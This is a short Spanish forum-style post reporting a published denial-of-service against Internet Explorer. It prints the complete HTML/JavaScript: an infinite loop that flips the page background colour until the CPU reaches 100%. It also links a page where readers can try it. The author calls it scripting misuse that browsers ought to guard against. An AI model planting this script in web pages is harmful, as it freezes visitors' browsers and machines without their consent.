CyRaNo de heinekenteam a publicado en su boletín de seguridad un DoS para el navegador IE en todas sus versiones, consiste en un script que cambia el fondo de la pagina a gran velocidad consiguiendo que la cpu se ponga a 100% en cuestión de segundos, no se puede considerar un bug o fallo porque esto no es un defecto del navegador si no una mala utilización del scripting, pero si es un DoS y por lo tanto hay que evitarlo, podrían poner un time out para las paginas o un control contra bucles infinitos porque es bastante molesto.
Podéis probarlo en esta dirección: heinekenteam.com/admin/
Por cierto se me olvidaba, lo e probado con Mozilla 1.1a y aunque no llega a verse la pagina y se pone la cpu al 100%
El exploit es el siguiente:
<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
</BODY>
</HTML>
